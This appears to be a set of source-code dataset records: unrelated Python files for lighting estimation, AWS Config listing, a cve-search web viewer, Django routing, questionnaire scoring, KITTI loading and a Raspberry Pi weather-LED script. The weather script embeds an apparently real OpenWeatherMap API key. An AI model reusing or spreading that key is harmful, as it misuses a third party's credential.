        ||Y - A*alpha|| + lambda*(alpha'*alpha)
    result:
        A'*(Y - A*alpha) + lambda*alpha = 0
        ==>
        (A'*A*alpha - lambda)*alpha = A'*Y
        left: 9 x 9
        right: 9 x 1
    '''
    n_vis_ind = len(vis_ind)
    n = n_vis_ind*c

    Y = np.zeros((n, 1))
    A = np.zeros((n, 9))
    light = np.zeros((3, 1))

    # Initial per-channel light scale from a least-squares fit on the albedo.
    for k in range(c):
        Y[k*n_vis_ind:(k+1)*n_vis_ind, :] = image_pixel[k, vis_ind][:, np.newaxis]
        A[k*n_vis_ind:(k+1)*n_vis_ind, :] = texture[k, vis_ind][:, np.newaxis] * harmonic[vis_ind, :]
        Ac = texture[k, vis_ind][:, np.newaxis]
        Yc = image_pixel[k, vis_ind][:, np.newaxis]
        light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))

    # Alternate between solving the ridge-regularised system for the SH
    # coefficients (alpha) and rescaling the per-channel light strength.
    for i in range(max_iter):

        Yc = Y.copy()
        for k in range(c):
            Yc[k*n_vis_ind:(k+1)*n_vis_ind, :] /= light[k]

        # update alpha
        equation_left = np.dot(A.T, A) + lamb*np.eye(harmonic_dim); # why + ?
        equation_right = np.dot(A.T, Yc)
        alpha = np.dot(np.linalg.inv(equation_left), equation_right)

        # update light
        for k in range(c):
            Ac = A[k*n_vis_ind:(k+1)*n_vis_ind, :].dot(alpha)
            Yc = Y[k*n_vis_ind:(k+1)*n_vis_ind, :]
            light[k] = (Ac.T.dot(Yc))/(Ac.T.dot(Ac))

    appearance = np.zeros_like(texture)
    for k in range(c):
        tmp = np.dot(harmonic*texture[k, :][:, np.newaxis], alpha*light[k])
        appearance[k,:] = tmp.T

    appearance = np.minimum(np.maximum(appearance, 0), 1)
    return appearance
| [
"1095215611@qq.com"
] | 1095215611@qq.com |
6b19f346e79e3bb234cd98628ac0189f74c1dc9c | 6c3bdcad87e2ddbc6d8e61419b62d91b898071ab | /sdk/python/config/listConfigRules.py | 51a7eddfa4e733f46e2266d99f1048c431a99d72 | [] | no_license | JaydeepUniverse/aws | c6b2a7f93668d7300223be46a418d436233ff9ad | 528043a78dc0a07bc8b0bb1193c7f440f8a5bd1a | refs/heads/master | 2023-02-22T00:41:32.376590 | 2021-01-16T10:17:22 | 2021-01-16T10:17:22 | 292,547,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | ## Do AWS CLI configuration - aws configure
import boto3
client = boto3.client('config')

# Print the name of every AWS Config rule returned.
# NOTE(review): only a single describe_config_rules call is made; if the
# account has more rules than one response page holds, the NextToken
# pagination would be needed - confirm rule count.
rulesList = client.describe_config_rules()
for i in rulesList['ConfigRules']:
    print(i['ConfigRuleName'])
| [
"noreply@github.com"
] | noreply@github.com |
3c7761a66a130162d48b33cc7bb6d62086a049f8 | 1b9dcc5051719fce3fdf6d64ef6b39adc10d5bb3 | /Tools/cve-search-master/web/minimal.py | 8ed4b0e2f7a93f31d4aeed408738049797a0376e | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] | permissive | abuvanth/watchdog | 20e0358a6892206fcc794478d2d24c95c838fa4e | 0a0fae253bf4321cdfb83052f56555a5ca77f7b9 | refs/heads/master | 2020-10-01T20:23:53.950551 | 2019-12-12T13:57:56 | 2019-12-12T13:57:56 | 227,618,188 | 2 | 0 | Apache-2.0 | 2019-12-12T13:51:25 | 2019-12-12T13:51:24 | null | UTF-8 | Python | false | false | 8,912 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Minimal web interface to cve-search to display the last entries
# and view a specific CVE.
#
# Software is free software released under the "Modified BSD license"
#
# Copyright (c) 2013-2016 Alexandre Dulaunoy - a@foo.be
# Copyright (c) 2014-2016 Pieter-Jan Moreels - pieterjan.moreels@gmail.com
# imports
import os
import re
import sys
import urllib
_runPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(_runPath, ".."))
from flask import render_template, request
import lib.DatabaseLayer as db
import lib.Toolkit as tk
from lib.Config import Configuration
from web.api import API, APIError
class Minimal(API):
#############
# Variables #
#############
defaultFilters={'timeSelect': 'all',
'startDate': '', 'endDate': '', 'timeTypeSelect': 'Modified',
'cvssSelect': 'all', 'cvss': '', 'rejectedSelect': 'hide'}
args = {'pageLength': Configuration.getPageLength(),
'listLogin': Configuration.listLoginRequired(),
'minimal': True}
    def __init__(self):
        """Register the minimal UI's routes, template filters, context
        processors and error handlers on the underlying Flask app."""
        self.minimal = True
        super().__init__()
        # r: URL rule, m: allowed HTTP methods, f: bound view function.
        routes = [{'r': '/', 'm': ['GET'], 'f': self.index},
                  {'r': '/', 'm': ['POST'], 'f': self.index_post},
                  {'r': '/r/<int:r>', 'm': ['GET'], 'f': self.index_filter_get},
                  {'r': '/r/<int:r>', 'm': ['POST'], 'f': self.index_filter_post},
                  {'r': '/cve/<cveid>', 'm': ['GET'], 'f': self.cve},
                  {'r': '/cwe', 'm': ['GET'], 'f': self.cwe},
                  {'r': '/cwe/<cweid>', 'm': ['GET'], 'f': self.relatedCWE},
                  {'r': '/capec/<capecid>', 'm': ['GET'], 'f': self.capec},
                  {'r': '/browse', 'm': ['GET'], 'f': self.browse},
                  {'r': '/browse/', 'm': ['GET'], 'f': self.browse},
                  {'r': '/browse/<vendor>', 'm': ['GET'], 'f': self.browse},
                  {'r': '/search/<vendor>/<path:product>', 'm': ['GET'], 'f': self.search},
                  {'r': '/search', 'm': ['POST'], 'f': self.freetext_search},
                  {'r': '/link/<key>/<value>', 'm': ['GET'], 'f': self.link}]
        # n: Jinja2 filter name, f: the filter callable.
        filters = [{'n': 'htmlEncode', 'f': self.htmlEncode},
                   {'n': 'htmlDecode', 'f': self.htmlDecode},
                   {'n': 'sortIntLikeStr', 'f': self.sortIntLikeStr}]
        context_processors = [self.JSON2HTMLTable]
        error_handlers = [{'e': 404, 'f': self.page_not_found}]
        for route in routes: self.addRoute(route)
        for _filter in filters: self.addFilter(_filter)
        for context in context_processors: self.addContextProcessors(context)
        for handler in error_handlers: self.app.register_error_handler(handler['e'], handler['f'])
#############
# Functions #
#############
    def addFilter(self, _filter):
        # Register a Jinja2 template filter from a {'n': name, 'f': callable} dict.
        self.app.add_template_filter(_filter['f'], _filter['n'])
    def addContextProcessors(self, context_processor):
        # Make the callable's return value available in every template context.
        self.app.context_processor(context_processor)
def getFilterSettingsFromPost(self, r):
filters = dict(request.form)
filters = {x: filters[x][0] for x in filters.keys()}
errors = False
# retrieving data
try:
cve = self.filter_logic(filters, r)
except Exception as e:
cve = db.getCVEs(limit=self.args['pageLength'], skip=r)
errors = True
return {'filters': filters, 'cve': cve, 'errors': errors}
return(filters,cve,errors)
##########
# ROUTES #
##########
    # /
    def index(self):
        """Landing page: the latest CVEs under the default filters."""
        cve = self.filter_logic(self.defaultFilters, 0)
        return render_template('index.html', cve=cve, r=0, **self.args)
    # /
    def index_post(self):
        """Landing page rendered with user-submitted filters (POST)."""
        args = dict(self.getFilterSettingsFromPost(0), **self.args)
        return render_template('index.html', r=0, **args)
    # /r/<r>
    def index_filter_get(self, r):
        """Paginated listing; ``r`` is the number of records to skip."""
        if not r or r < 0: r = 0
        cve = self.filter_logic(self.defaultFilters, r)
        return render_template('index.html', cve=cve, r=r, **self.args)
    # /r/<r>
    def index_filter_post(self, r):
        """Paginated listing with user-submitted filters (POST)."""
        if not r or r < 0: r = 0
        args = dict(self.getFilterSettingsFromPost(r), **self.args)
        return render_template('index.html', r=r, **args)
    # /cve/<cveid>
    def cve(self, cveid):
        """Detail page for one CVE, or an error page when it is unknown."""
        cve = self.api_cve(cveid)
        if not cve:
            return render_template('error.html',status={'except':'cve-not-found','info':{'cve':cveid}},minimal=self.minimal)
        return render_template('cve.html', cve=cve, minimal=self.minimal)
    # /cwe
    def cwe(self):
        """CWE overview, showing only entries with weakness abstraction 'Class'."""
        cwes=[x for x in self.api_cwe() if x["weaknessabs"].lower()=="class"]
        return render_template('cwe.html', cwes=cwes, capec=None, minimal=self.minimal)
    # /cwe/<cweid>
    def relatedCWE(self, cweid):
        """CWE detail page with the CAPEC attack patterns tied to ``cweid``."""
        cwes={x["id"]: x["name"] for x in self.api_cwe()}
        return render_template('cwe.html', cwes=cwes, cwe=cweid, capec=db.getCAPECFor(cweid), minimal=self.minimal)
# /capec/<capecid>
def capec(self, capecid):
cwes={x["id"]: x["name"] for x in self.api_cwe()}
return render_template('capec.html', cwes=cwes, capec=db.getCAPEC(capecid), minimal=self.minimal)
# /browse
# /browse/
# /browse/<vendor>
    def browse(self, vendor=None):
        """Vendor/product browser.

        Without a vendor, api_browse lists vendors; with one, it lists that
        vendor's products. Any APIError is rendered as an error page.
        """
        try:
            data = self.api_browse(vendor)
            if 'product' in data and 'vendor' in data:
                return render_template('browse.html', product=data["product"], vendor=data["vendor"], minimal=self.minimal)
            else:
                # The CPE dictionary had no entry for this vendor.
                return render_template('error.html', minimal=self.minimal, status={'except':'browse_exception', 'info': 'No CPE'})
        except APIError as e:
            return render_template('error.html', minimal=self.minimal, status={'except':'browse_exception', 'info':e.message})
# /search/<vendor>/<product>
def search(self, vendor=None, product=None):
search = vendor + ":" + product
cve = db.cvesForCPE(search)
return render_template('search.html', vendor=vendor, product=product, cve=cve, minimal=self.minimal)
# /search
def freetext_search(self):
search = request.form.get('search')
result = db.getSearchResults(search)
cve=result['data']
errors=result['errors'] if 'errors' in result else []
return render_template('search.html', cve=cve, errors=errors, minimal=self.minimal)
# /link/<key>/<value>
    def link(self, key=None,value=None):
        """Page listing CVEs linked through a VIA4 field/value pair.

        key and value arrive URL-encoded (see JSON2HTMLTable's doublequote);
        the value is matched case-insensitively as an escaped literal.
        """
        key=self.htmlDecode(key)
        value=self.htmlDecode(value)
        regex = re.compile(re.escape(value), re.I)
        cve=db.via4Linked(key, regex)
        # Min/max CVSS over the linked CVEs that actually carry a score.
        cvssList=[float(x['cvss']) for x in cve if x.get('cvss')]
        if cvssList:
            stats={'maxCVSS': max(cvssList), 'minCVSS': min(cvssList),'count':len(cve)}
        else:
            stats={'maxCVSS': 0, 'minCVSS': 0, 'count':len(cve)}
        return render_template('linked.html', via4map=key.split(".")[0], field='.'.join(key.split(".")[1:]),
                               value=value, cve=cve, stats=stats, minimal=self.minimal)
###########
# Filters #
###########
def htmlEncode(self, string):
return urllib.parse.quote_plus(string).lower()
def htmlDecode(self, string):
return urllib.parse.unquote_plus(string)
def sortIntLikeStr(self, datalist):
return sorted(datalist, key=lambda k: int(k))
def JSON2HTMLTable(self):
# Doublequote, because we have to |safe the content for the tags
def doublequote(data):
return urllib.parse.quote_plus(urllib.parse.quote_plus(data))
def JSON2HTMLTableFilter(data, stack = None):
_return = ""
if type(stack) == str: stack = [stack]
if type(data) == list:
if len(data) == 1:
_return += JSON2HTMLTableFilter(data[0], stack)
else:
_return += '<ul class="via4">'
for item in data:
_return += ('<li>%s</li>'%JSON2HTMLTableFilter(item, stack))
_return += '</ul>'
elif type(data) == dict:
_return += '<table class="invisiTable">'
for key, val in sorted(data.items()):
_return += '<tr><td><b>%s</b></td><td>%s</td></tr>'%(key, JSON2HTMLTableFilter(val, stack+[key]))
_return += '</table>'
elif type(data) == str:
if stack:
_return += "<a href='/link/"+doublequote('.'.join(stack))+"/"+doublequote(data)+"'>" #link opening
_return += "<span class='glyphicon glyphicon-link' aria-hidden='true'></span> </a>"
_return += "<a target='_blank' href='%s'>%s</a>"%(data, data) if tk.isURL(data) else data
_return += ""
return _return
return dict(JSON2HTMLTable=JSON2HTMLTableFilter)
##################
# Error Messages #
##################
    def page_not_found(self, e):
        """Flask 404 handler (registered via register_error_handler in setup)."""
        return render_template('404.html', minimal=self.minimal), 404
if __name__ == '__main__':
    # Run the development server when this module is executed directly.
    server = Minimal()
    server.start()
| [
"mohan.kk@flipkart.com"
] | mohan.kk@flipkart.com |
32d8b228910b00555072d555646b4a470a56bb2b | 0ce37bdeab869e0b20dab275f0f7e1b3bf7dcb60 | /project/project/urls.py | bd5366ef2d10037ae18a26c664cd0fb65e54585f | [
"MIT"
] | permissive | amritharun/squirrel-tracker | c9fcd15a59f73b4d80d072c190b74f7bd3d2239e | e3d0223ede58b442c53a0fa931ed59d4443ed4a1 | refs/heads/main | 2022-12-30T19:40:56.716080 | 2020-10-22T19:58:40 | 2020-10-22T19:58:40 | 302,137,821 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | """project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# URL routing table: the admin site, plus everything else delegated to the
# tracker app's URLconf.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('tracker.urls')),
]
| [
"aa4053@columbia.edu"
] | aa4053@columbia.edu |
499e15bc058b825877025eda2fa9a34fc9c1cc8f | b4314f089cbb4163a3dc063f0c708117e168f56d | /pytdjangoblog/urls.py | 8724a1344757d930c2178c83320f0ca504cb6d47 | [] | no_license | tinodau/LearnDjango | dd2551f8445a113f17347c7d13e855254fbad683 | ced3d29cd94bfe9a50d32c005d34fdf170d5a105 | refs/heads/master | 2020-06-14T03:33:01.159897 | 2016-12-04T01:12:11 | 2016-12-04T01:12:11 | 75,509,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,029 | py | """pytdjangoblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from myblog.views import hello, current_time
from books import views
# URL routing table: admin plus demo views from myblog and the books app's
# search/contact pages.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^hello/$', hello),
    url(r'^time/$', current_time),
    url(r'^search-form/$', views.search_form),
    url(r'^search/$', views.search),
    url(r'^contact/$', views.contact),
]
| [
"daulat.rachmanto@gmail.com"
] | daulat.rachmanto@gmail.com |
71d91862e4376636867c0d4e4cf9c0e031276eab | 192494cfac925b9134723185ce9e844b3b13abca | /texteditorlib/autotyping.py | 957de6010fb912e703b50d45e4598123b6a8ca73 | [] | no_license | mdsajjadansari/Text-Editor | 78145511bf7111c8f0e0074656eb466c88c750a6 | 342de71e494afe764d059926ddeaed1604dd8a70 | refs/heads/master | 2022-06-17T14:29:45.861129 | 2020-05-05T00:44:43 | 2020-05-05T00:44:43 | 259,432,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py |
if __name__=='__main__':
from Graphics import Tkinter
else:
from .Graphics import Tkinter
if __name__=='__main__':
from Graphics import Tkinter as tk, tkFileDialog, tkMessageBox
else:
from .Graphics import Tkinter as tk, tkFileDialog, tkMessageBox
import time
import threading
class AutoWrite:
    """Types the contents of a user-chosen text file into a Tkinter Text
    widget one character at a time, simulating live typing."""
    def __init__(self, pad):
        """pad: the Tkinter Text widget to type into.

        Opens a file-chooser dialog; typing starts immediately when a file
        is picked, otherwise self.s stays None and nothing is typed.
        """
        self.text = pad
        path = tkFileDialog.askopenfilename()
        if path:
            # 'with' guarantees the file handle is closed (the original
            # open(path).read() leaked it).
            with open(path, 'r') as source_file:
                self.s = source_file.read()
            self.insert_words()
        else:
            self.s = None
    def insert_words(self):
        """Insert self.s one character every 0.1 s, refreshing the UI."""
        if not self.s:
            # Nothing loaded (dialog cancelled) — the original iterated None
            # here and crashed with TypeError.
            return
        print("[+] Auto Typing Executed")
        for ch in self.s:
            self.text.insert("end", str(ch))
            time.sleep(0.1)
            self.text.master.update()
            self.text.master.update_idletasks()
        return
if __name__ == '__main__':
    # Demo driver: a bare Tk window with a Text widget.
    root = Tkinter.Tk()
    t= Tkinter.Text(root)
    t.pack()
    # NOTE(review): AutoWrite.__init__ already types the file once; the
    # explicit insert_words() call below and the thread each type it again,
    # so the text can be inserted up to three times. Likely only one of
    # these was intended.
    k=AutoWrite(t)
    s=threading.Thread(target=k.insert_words)
    k.insert_words()
    s.start()
    root.mainloop()
| [
"iamsajjadansari@gmail.com"
] | iamsajjadansari@gmail.com |
48b2e11482852404b0d42df21d5e7252714aaf19 | 53bff3de85c6e04b448623a4f71b062b6a102974 | /PhysicalCuriosity/PhysicalCuriosityStudy.py | 7c0705c53a8edc453845c489f3ae6af609f8bd3b | [] | no_license | rinatrosenbergkima/pandas | 366f9e35f753f0dd5e3016d1e79d22028171e656 | 1ed61618105f776af072380da8b521f47f4236ae | refs/heads/master | 2021-09-27T20:28:16.485741 | 2018-11-11T16:32:12 | 2018-11-11T16:32:12 | 109,816,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,246 | py | #tutorial:
#https://github.com/QuantScientist/Deep-Learning-Boot-Camp/blob/master/day01/Intro_ml_models.ipynb
#https://github.com/QuantScientist/Deep-Learning-Boot-Camp/blob/master/day01/predicting_income_from_census_income_data.ipynb
# > this is how to install pandas
# > sudo easy_install pip
# > pip install wheel
# > pip install pandas
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
df_AQ = pd.read_csv('data/AQ.csv', sep=',')
df_BFI = pd.read_csv('data/BFI.csv', sep=',')
df_demographics = pd.read_csv('data/demographics.csv', sep=',')
df_tablet = pd.read_csv('data/tablet.csv', sep=',')
df_summary = pd.DataFrame ()
def process_BFI():
    """Score the Big Five Inventory: reverse-code the negatively keyed items,
    then compute the five factor means. Mutates the module-level df_BFI
    in place.
    """
    # Reverse BFI: negatively keyed items are flipped on the 1..5 scale
    # (x -> 6 - x) and stored under a '<item>r' column.
    # BUGFIX: the original computed BFI_24r from BFI_4 instead of BFI_24.
    reversed_items = [6, 21, 9, 24, 34, 2, 12, 27, 37, 8, 18, 23, 43, 35, 41]
    for item in reversed_items:
        df_BFI["BFI_%dr" % item] = 6 - df_BFI["BFI_%d" % item]
    # calculate the big 5 factors as the mean of each factor's items:
    df_BFI["BFI_extraversion"] = df_BFI[["BFI_1","BFI_6r","BFI_11","BFI_16","BFI_21r","BFI_26","BFI_31","BFI_36"]].mean(axis=1)
    df_BFI["BFI_neuroticism"] = df_BFI[["BFI_4","BFI_9r","BFI_14","BFI_24r","BFI_29","BFI_34r","BFI_39"]].mean(axis=1)
    df_BFI["BFI_agreeableness"] = df_BFI[["BFI_2r","BFI_7","BFI_12r","BFI_17","BFI_22","BFI_27r","BFI_32","BFI_37r","BFI_42"]].mean(axis=1)
    df_BFI["BFI_concientiousness"] = df_BFI[["BFI_3","BFI_8r","BFI_13","BFI_18r","BFI_23r","BFI_28","BFI_33","BFI_38","BFI_43r"]].mean(axis=1)
    df_BFI["BFI_openness"] = df_BFI[["BFI_5","BFI_10","BFI_15","BFI_20","BFI_25","BFI_30","BFI_35r","BFI_40","BFI_41r","BFI_44"]].mean(axis=1)
def process_AQ():
    """Score the Autism Spectrum Quotient: reverse the disagree-keyed items,
    binarise every item, then sum into AQ_total. Mutates df_AQ in place."""
    # reverse AQ (Autism Spectrum Quotient Questions)
    ## http://aspergerstest.net/interpreting-aq-test-results/
    df_AQ["AQ_3"] = 6 - df_AQ["AQ_3"]
    df_AQ["AQ_8"] = 6 - df_AQ["AQ_8"]
    df_AQ["AQ_10"] = 6 - df_AQ["AQ_10"]
    df_AQ["AQ_11"] = 6 - df_AQ["AQ_11"]
    df_AQ["AQ_14"] = 6 - df_AQ["AQ_14"]
    df_AQ["AQ_15"] = 6 - df_AQ["AQ_15"]
    df_AQ["AQ_17"] = 6 - df_AQ["AQ_17"]
    df_AQ["AQ_24"] = 6 - df_AQ["AQ_24"]
    df_AQ["AQ_25"] = 6 - df_AQ["AQ_25"]
    df_AQ["AQ_27"] = 6 - df_AQ["AQ_27"]
    df_AQ["AQ_28"] = 6 - df_AQ["AQ_28"]
    df_AQ["AQ_29"] = 6 - df_AQ["AQ_29"]
    df_AQ["AQ_30"] = 6 - df_AQ["AQ_30"]
    df_AQ["AQ_31"] = 6 - df_AQ["AQ_31"]
    df_AQ["AQ_32"] = 6 - df_AQ["AQ_32"]
    df_AQ["AQ_34"] = 6 - df_AQ["AQ_34"]
    df_AQ["AQ_36"] = 6 - df_AQ["AQ_36"]
    df_AQ["AQ_37"] = 6 - df_AQ["AQ_37"]
    df_AQ["AQ_38"] = 6 - df_AQ["AQ_38"]
    df_AQ["AQ_40"] = 6 - df_AQ["AQ_40"]
    df_AQ["AQ_44"] = 6 - df_AQ["AQ_44"]
    df_AQ["AQ_47"] = 6 - df_AQ["AQ_47"]
    df_AQ["AQ_48"] = 6 - df_AQ["AQ_48"]
    df_AQ["AQ_49"] = 6 - df_AQ["AQ_49"]
    df_AQ["AQ_50"] = 6 - df_AQ["AQ_50"]
    # Definitely agree or Slightly agree responses to questions 1, 2, 4, 5, 6, 7, 9, 12, 13, 16, 18, 19, 20, 21, 22, 23, 26, 33, 35, 39, 41, 42, 43, 45, 46 score 1 point.
    # Definitely disagree or Slightly disagree responses to questions 3, 8, 10, 11, 14, 15, 17, 24, 25, 27, 28, 29, 30, 31, 32, 34, 36, 37, 38, 40, 44, 47, 48, 49, 50 score 1 point.
    for column in df_AQ.iloc[:,1:51]:
        df_AQ[column] = (df_AQ[column]>3)*1 # one point for responses above the midpoint (disagree-keyed items were reversed above)
    df_AQ["AQ_total"] = df_AQ.iloc[:,1:51].sum(axis=1)
def create_df_summary():
    """Assemble df_summary from the questionnaire, demographic and tablet
    frames. Mutates the module-level df_summary in place; call after
    process_BFI() and process_AQ().
    """
    # create data frame with the important data
    df_summary["id"] = df_AQ["id"]
    df_summary["demographics_age"] = df_demographics["age"]
    df_summary["demographics_gender"] = df_demographics["gender"]
    df_summary["demographics_grades"] = df_demographics["grades"]
    df_summary["demographics_psychometrics"] = df_demographics["psychometrics"]
    df_summary["demographics_control_robot"] = df_demographics["control_robot"]
    df_summary["demographics_q1"] = df_demographics["q1"]
    df_summary["demographics_q2"] = df_demographics["q2"]
    df_summary["demographics_q3"] = df_demographics["q3"]
    df_summary["tablet_transition_entropy"] = df_tablet["transition_entropy"]
    # (a duplicated, identical assignment of this column was removed)
    df_summary["tablet_multi_discipline_entropy"] = df_tablet["Multi_discipline_entropy"]
    # NOTE: 'tablet_psycholetrics' is a typo but is kept as-is — downstream
    # code may reference the existing column name.
    df_summary["tablet_psycholetrics"] = df_tablet["PSY"]
    df_summary["tablet_normalized_total_listenning_time"] = df_tablet["normalized_total_listenning_time"]
    df_summary["BFI_extraversion"] = df_BFI["BFI_extraversion"]
    df_summary["BFI_neuroticism"] = df_BFI["BFI_neuroticism"]
    df_summary["BFI_agreeableness"] = df_BFI["BFI_agreeableness"]
    df_summary["BFI_concientiousness"] = df_BFI["BFI_concientiousness"]
    df_summary["BFI_openness"] = df_BFI["BFI_openness"]
    df_summary["AQ_total"] = df_AQ["AQ_total"]
    #print(df_summary)
def correlation_matrix(df,title):
    """Draw the correlation matrix of *df* as a labelled heat map."""
    from matplotlib import pyplot as plt
    from matplotlib import cm as cm
    print("correlation_matrix")
    fig = plt.figure()
    ax1 = fig.add_subplot(111)
    cmap = cm.get_cmap('jet', 10)
    cax = ax1.imshow(df.corr(), interpolation="nearest", cmap=cmap)
    ax1.grid(True)
    plt.title(title)
    labels=list(df) #the dataframe headers
    print(labels)
    # BUGFIX: pin one tick per column before labelling; without this the
    # labels attach to matplotlib's default tick positions and end up
    # misaligned with the matrix rows/columns.
    tick_positions = np.arange(len(labels))
    ax1.set_xticks(tick_positions)
    ax1.set_yticks(tick_positions)
    ax1.set_xticklabels(labels,fontsize=4, rotation='vertical')
    ax1.set_yticklabels(labels,fontsize=4)
    # Add colorbar, make sure to specify tick locations to match desired ticklabels
    fig.colorbar(cax, ticks=[0,.05,.10,.15,.20,.25,.30,.35,.40,.45,.50,.55,.60,.65,.70,.75,.8,.85,.90,.95,1])
    plt.show()
def correlation_summary(df):
    """Print the correlation matrix of *df* and show it as an image."""
    corr = df.corr()
    print(corr)
    plt.matshow(corr)
    # BUGFIX: label the axes from the dataframe that was passed in; the
    # original read the module-level df_summary regardless of the argument.
    headers = list(df)
    x_pos = np.arange(len(headers))
    plt.xticks(x_pos, headers, rotation='vertical', fontsize=4)
    y_pos = np.arange(len(headers))
    plt.yticks(y_pos, headers, fontsize=4)
    plt.show()
def plot_correlations(x,y):
    """Scatter-plot x against y with a least-squares line fitted over the
    pairs where both values are finite."""
    fig, ax = plt.subplots()
    finite_mask = np.isfinite(x) & np.isfinite(y)
    slope, intercept = np.polyfit(x[finite_mask], y[finite_mask], deg=1)
    ax.plot(x[finite_mask], slope * x[finite_mask] + intercept, color='red')
    ax.scatter(x, y)
    fig.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Driver: score the questionnaires, build the combined summary table, then
# plot one correlation of interest (the commented calls are alternatives).
process_BFI()
process_AQ()
create_df_summary()
#correlation_summary(df_summary)
#correlation_matrix(df_summary,"correlations")
plot_correlations(df_summary["demographics_psychometrics"],df_summary["BFI_extraversion"])
#plt.plot(df_summary["demographics_grades"],df_summary["BFI_extraversion"], 'ro')
#plt.plot(df_summary["BFI_concientiousness"],df_summary["tablet_normalized_total_listenning_time"], 'ro')
| [
"rinat.rosenberg.kima@gmail.com"
] | rinat.rosenberg.kima@gmail.com |
31ad4b8319049da0c46adfbd3bb7d1f84e6ca502 | 364cad049756c8ae0882c4bddac36d27c9b9d5c9 | /ipynb/process_KITTI_data.py | 656c1171aa4f92c91f735fd90a4bad880e7c1487 | [
"MIT"
] | permissive | GarethZhang/PointNetLK | c03ee81425248749bad670b98257b7dfa02a7c8f | c5208880e3ebfabb8f0477bd0a012c88fd316aa6 | refs/heads/master | 2020-09-08T09:24:19.371643 | 2019-11-14T07:02:53 | 2019-11-14T07:02:53 | 221,093,069 | 0 | 0 | MIT | 2019-11-12T00:07:27 | 2019-11-12T00:07:26 | null | UTF-8 | Python | false | false | 491 | py | import pykitti
import os
import numpy as np
from scipy.stats import binned_statistic
import pickle
import cv2
def make_dir_if_not_exist(path):
    """Create *path* (including missing parents) if needed and return it.

    Uses exist_ok=True so concurrent callers cannot race between the
    existence check and the creation (the original check-then-create could
    raise FileExistsError under that race).
    """
    os.makedirs(path, exist_ok=True)
    return path
def ensure_file_dir_exists(path):
    """Create the parent directory of file *path* if needed; return *path*."""
    parent = os.path.dirname(path)
    make_dir_if_not_exist(parent)
    return path
# Local KITTI odometry dataset root and the sequences to process.
base_dir = '/home/haowei/Documents/files/research/datasets/KITTI/dataset'
sequences = ["04"]
# Load each sequence with pykitti (frames=None means all frames).
for seq in sequences:
data = pykitti.odometry(base_dir, seq, frames=None) | [
"gareth.zhang@mail.utoronto.ca"
] | gareth.zhang@mail.utoronto.ca |
beeb994bc275b0d7566e4102cb3cde213340d3ed | d7ae1e6da46ae8198aedff8c3a21db09c6829083 | /my1021_2_2.py | 54c29253165b444ada0bfbc5961cdaa67d83bc64 | [] | no_license | Aminoragit/Mr.noobiest | b503bbeac2777cd2fe6c5ba24d032f2204fe7bde | 5070e7c3215c8a6400879e52e55f47125bfca268 | refs/heads/master | 2022-03-26T18:22:31.989429 | 2019-12-27T00:31:08 | 2019-12-27T00:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | string_object = "python programming"
# Print each character of the string on its own line.
for character in string_object:
    print(character)
| [
"noreply@github.com"
] | noreply@github.com |
ad703714edd63c2fc81280105c049bd81f3fb31a | 7d5af69c8ff72a003d171072e0f025400f309fc8 | /get_weather_pyowm.py | 38365653e54613d36283e50afb8d54fcdea697d8 | [] | no_license | elormcent/centlorm | a47f033e39fc9e093607e3705613fcd07bb8852d | ec7a60faa2dc2c196247ccd44d2fb6dbd7c2bdad | refs/heads/master | 2020-06-18T07:43:52.555439 | 2019-07-15T16:14:21 | 2019-07-15T16:14:21 | 196,219,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,479 | py | import pyowm
from gpiozero import LED
from time import sleep
def Weather_Forecast():
    """Prompt for a location, fetch the current weather from OpenWeatherMap,
    and flash a GPIO LED colour-coded by wind speed:
    green (< 15), yellow (15..20), red (>= 21).
    """
    city = input("Enter Name of City with space :- ")
    country = input("Enter Name of Country :- ")
    led = LED(17)   # yellow
    led1 = LED(18)  # red
    led2 = LED(27)  # green
    apikey = '51c6723dd2f51626dd33896729e79676'
    owm = pyowm.OWM(apikey)
    # BUGFIX: the original passed the literal string 'city, country',
    # ignoring the user's input entirely.
    observation = owm.weather_at_place('{},{}'.format(city, country))
    w = observation.get_weather()
    winds = w.get_wind()
    humidities = w.get_humidity()
    tempreture = w.get_temperature()
    presh = w.get_pressure()
    clud = w.get_clouds()
    ran = w.get_rain()
    snoww = w.get_snow()
    print(" The weather information ")
    # Pick the LED for the wind band.
    # BUGFIX: the original's `> 15 or < 21` condition was always true, so the
    # red branch was unreachable, and that branch called led1.on()() which
